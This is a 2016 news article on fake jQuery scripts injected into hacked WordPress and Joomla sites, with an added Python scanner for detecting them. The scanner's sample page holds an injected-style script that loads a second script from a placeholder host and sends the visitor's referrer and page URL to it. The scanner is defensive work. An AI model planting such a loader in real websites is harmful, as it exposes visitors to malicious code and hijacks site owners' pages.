WordPress and Joomla Sites Hacked to Host Malicious JavaScript Code

Sunday, April 03, 2016

Ionut Arghire


Over the past few months, hackers have been abusing popular JavaScript library jQuery to inject malicious scripts into the head sections of websites powered by WordPress and Joomla, Avast researchers say.

Historically, fake jQuery injections have been highly popular among cybercriminals, but the recently observed infection campaign has managed to compromise a very large number of domains, thus exposing millions of users to the malicious code.

With almost 70 million unique files on hacked websites containing the fake jQuery script, the infection has reached an abnormally high number of domains, Avast’s Alexej Savčin explains in a blog post. Since November, the security company has observed over 4.5 million users being exposed to these compromised websites, the researcher says.

While website visitors notice nothing unusual, a quick look at the page’s source reveals the fake jQuery script in the head section of pages on the affected WordPress and Joomla sites. As Avast explains, the code is not obfuscated: it declares a few variables and contains a single IF statement that inserts another JavaScript source.

The tell-tale change is in the “var base =” assignment, which points to another hacked website that in turn serves as the source of the injected malicious script. The researchers found that compromised domains were being used to host the malicious JavaScript, and that the attack was effective enough to remain in daily use.

According to Avast, the malicious code begins with a 10-millisecond timeout, a common practice in injected code, although a longer delay is more typical. Next, the “encodeURIComponent” function is used on almost every line to encode special characters such as , / ? : @ & = + $ #.

“The final condition checks if variables contain necessary values and after evaluation another source for script is inserted. This URL is then used to increase SEO rank for other domains. Using referral page and backlinks makes it more valid,” Savčin explains.
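As an added example (not from the article or from Avast’s post), the following Python scanner flags inline scripts in a page’s head section that show the traits described above: a very short setTimeout, repeated encodeURIComponent calls, a “var base =” pointing at a host other than the site’s own, and dynamic insertion of a second script source. The sample page and the host names in it are constructed placeholders, not real indicators.

```python
import re
from urllib.parse import urlparse

# Indicators distilled from the behaviour described above: a short setTimeout,
# encodeURIComponent use, a foreign "var base =", and a second <script> insertion.
TIMEOUT_RE = re.compile(
    r"setTimeout\s*\(\s*(?:function\s*\([^)]*\)\s*\{.*?\}|[\w.$]+)\s*,\s*(\d+)\s*\)", re.S)
ENCODE_RE = re.compile(r"encodeURIComponent\s*\(")
BASE_RE = re.compile(r"var\s+base\s*=\s*['\"]((?:https?:)?//[^'\"]+)['\"]")
DYNAMIC_RE = re.compile(r"createElement\s*\(\s*['\"]script['\"]\s*\)", re.I)
HEAD_RE = re.compile(r"<head\b.*?</head>", re.S | re.I)
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)


def scan_head_scripts(html, site_host, min_hits=3):
    """Return one finding per inline head <script> tripping >= min_hits indicators."""
    findings = []
    head = HEAD_RE.search(html)
    if not head:
        return findings
    for m in SCRIPT_RE.finditer(head.group(0)):
        body, hits = m.group(1), []
        t = TIMEOUT_RE.search(body)
        if t and int(t.group(1)) <= 100:          # 10 ms in the reported campaign
            hits.append("short_timeout")
        if len(ENCODE_RE.findall(body)) >= 2:     # encoding on almost every line
            hits.append("encode_uri")
        b = BASE_RE.search(body)
        if b:
            url = b.group(1) if b.group(1).startswith("http") else "https:" + b.group(1)
            host = urlparse(url).hostname
            if host and host != site_host:         # base lives on another site
                hits.append("foreign_base:" + host)
        if DYNAMIC_RE.search(body):                # conditional second script insert
            hits.append("dynamic_script")
        if len(hits) >= min_hits:
            findings.append({"offset": head.start() + m.start(), "hits": hits})
    return findings


# Constructed sample page; "compromised-host.example" is a placeholder, not an IoC.
SAMPLE_PAGE = """<html><head><title>site</title><script>
var base = "//compromised-host.example";
var ref = encodeURIComponent(document.referrer), loc = encodeURIComponent(location.href);
setTimeout(function () {
  if (base && ref && loc) {
    var s = document.createElement('script');
    s.src = base + '/j.js?r=' + ref + '&u=' + loc;
    document.head.appendChild(s);
  }
}, 10);
</script></head><body>ok</body></html>"""
```

Run it over each HTML or PHP template your CMS emits for a page head and treat any finding as a file to restore from a clean backup rather than edit by hand.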

Site administrators who have fallen victim to the infection are advised to clean their own computers first, as the root source of the infection might be on their local machine. Next, they should scan their website for compromised files and try to clean them, or delete all of them and replace them with a recent, clean backup (taking care not to delete system files).

The difficulty with this type of compromise is that every file must be clean for the infection to be fully removed: if even a single, seemingly insignificant file remains compromised, the infection will be reinstated. Moreover, if the website is hosted on a server alongside other infected sites, chances are the infection will spread to it as well.

After cleaning the website, administrators are also advised to update their WordPress or Joomla installation, as older versions are more susceptible to compromise. They should also perform regular backups of their website, to make sure they can easily restore it to a clean state in case of compromise.

Related: WordPress Sites Used to Power Layer 7 DDoS Attacks

Related: Backdoor in WordPress Plugin Steals Admin Credentials
